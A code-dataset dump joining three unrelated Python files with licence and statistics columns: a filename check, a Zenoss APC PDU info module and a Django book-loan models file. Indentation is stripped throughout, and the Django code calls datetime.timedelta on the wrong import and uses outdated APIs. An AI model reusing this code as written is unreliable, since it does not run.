extension = ''
expected = args.expected + extension
if os.path.basename(args.out) != expected:
print("Output from generation: {} but expected: {}".format(args.out, expected))
sys.exit(1)
| apache-2.0 | 6,177,579,979,156,486,000 | 29.395833 | 87 | 0.717615 | false | 3.770026 | false | false | false |
zenoss/Community-Zenpacks | ZenPacks.ZenSystems.ApcPdu/ZenPacks/ZenSystems/ApcPdu/info.py | 3 | 1485 | ##########################################################################
# Author: Jane Curry, jane.curry@skills-1st.co.uk
# Date: February 3rd, 2011
# Revised:
#
# info.py for ApcPdu ZenPack
#
# This program can be used under the GNU General Public License version 2
# You can find full information here: http://www.zenoss.com/oss
#
################################################################################
__doc__="""info.py
Representation of ApcPdu components.
$Id: info.py,v 1.2 2010/12/14 20:45:46 jc Exp $"""
__version__ = "$Revision: 1.4 $"[11:-2]
from zope.interface import implements
from Products.Zuul.infos import ProxyProperty
from Products.Zuul.infos.component import ComponentInfo
from Products.Zuul.decorators import info
from ZenPacks.ZenSystems.ApcPdu import interfaces
class ApcPduOutletInfo(ComponentInfo):
implements(interfaces.IApcPduOutletInfo)
outNumber = ProxyProperty("outNumber")
outName = ProxyProperty("outName")
outState = ProxyProperty("outState")
outBank = ProxyProperty("outBank")
class ApcPduBankInfo(ComponentInfo):
implements(interfaces.IApcPduBankInfo)
bankNumber = ProxyProperty("bankNumber")
bankState = ProxyProperty("bankState")
bankStateText = ProxyProperty("bankStateText")
class ApcPduPSInfo(ComponentInfo):
implements(interfaces.IApcPduPSInfo)
supply1Status = ProxyProperty("supply1Status")
supply2Status = ProxyProperty("supply2Status")
| gpl-2.0 | -2,358,501,561,546,443,000 | 28.7 | 80 | 0.660606 | false | 3.69403 | false | false | false |
melkisedek/sen_project | src/books/models.py | 1 | 2286 | from django.db import models
from datetime import datetime
from django.utils import timezone
from django.conf import settings
from django.core.urlresolvers import reverse
# Create your models here.
class Author(models.Model):
first_name = models.CharField(max_length=60)
last_name = models.CharField(max_length=60)
email = models.EmailField(blank=True)
def __str__(self):
return self.first_name + ' ' + self.last_name
class Publisher(models.Model):
"""docstring for Publisher"""
name = models.CharField(max_length=200)
address = models.TextField(blank=True)
website = models.URLField(blank=True)
def __str__(self):
return self.name
class Book(models.Model):
name = models.CharField(max_length=200)
edition = models.SmallIntegerField(default=1)
authors = models.ManyToManyField(Author, blank=True)
publisher = models.ManyToManyField(Publisher, blank=True)
published = models.PositiveSmallIntegerField(blank=True)
pages = models.IntegerField(default=0)
isbn_10 = models.IntegerField(default=0,help_text="Do not include dashes")
isbn_13 = models.IntegerField(default=0,help_text="Do not include dashes")
description = models.TextField()
cover_image = models.ImageField('cover Image',
upload_to='cover_pics/%Y-%m-%d/',
null=True,
blank=True)
date_added = models.DateTimeField(default=datetime.now)
available = models.BooleanField(default=True)
# this method causes a button labelled "View on site" to
# appear in the top right-hand side in book admin page.
def get_absolute_url(self):
return reverse('books:book_detail', args=[self.id])
def __str__(self):
if self.edition==1:
nth="st"
elif self.edition==2:
nth="nd"
elif self.edition==3:
nth="rd"
else : nth="th"
return self.name + ", "+ str(self.edition)+nth + " Edition"
def was_added_recently(self):
return self.date_added >= timezone.now() - datetime.timedelta(days=30)
class Loaned(models.Model):
loaned_by = models.ForeignKey(settings.AUTH_USER_MODEL)
book = models.ForeignKey(Book)
timestamp = models.DateTimeField(auto_now_add=True)
returned = models.BooleanField(default=False)
def __str__(self):
return self.book.name
class Meta:
verbose_name = "Loaned Book"
| mit | 2,984,121,168,891,878,400 | 32.617647 | 75 | 0.706912 | false | 3.327511 | false | false | false |